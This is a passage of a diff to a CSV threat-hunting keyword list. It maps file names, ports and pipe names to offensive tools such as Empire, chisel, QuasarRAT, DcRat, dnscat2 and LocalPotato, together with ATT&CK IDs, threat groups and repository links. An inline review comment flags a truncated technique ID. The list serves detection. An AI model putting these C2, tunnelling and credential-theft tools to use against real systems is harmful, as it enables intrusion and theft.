Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*localhost/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*localhost:3000*striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*localhost:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*localhost:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*localhost:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*localpotato -i*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.exe*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" 
@@ -13216,18 +13373,18 @@ "*LocalPotato.vcxproj*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.zip*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato-master*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*localrelay_linux_amd64*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*LocateBrc4Config*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*lockless 
*.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*lockless *.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*log4shell*.nessus.org*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" -"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*LoGiC.NET.exe*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*loginsight.thrift*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information 
Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2468","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" +"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. 
it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2469","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" "*logs/Responder-Session.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/ridenum.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" 
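Review bot: The `*LockLess.exe*` row is re-added with its `metadata_tool_techniques` field still ending in `T1247 - T12`, a technique ID cut off mid-value; the refresh changes only the star count and leaves the truncation in place. A consumer that maps this column to ATT&CK gets an unresolvable ID for this keyword. The abrupt ending suggests the field was clipped by a length limit when it was generated (an inference), so either restore the full list or end it at the last complete ID, `... - T1227 - T1247`. A check in the update step that every entry matches `T\d{4}(\.\d{3})?` and is separated by ` - ` would catch this, and also the `T1204 -T1210` spacing in the `*log4_shell.rb*` row of the same hunk.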
@@ -13235,77 +13392,77 @@ "*logToBeaconLog*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*LOLBAS-Project*","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LOLBins/NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense 
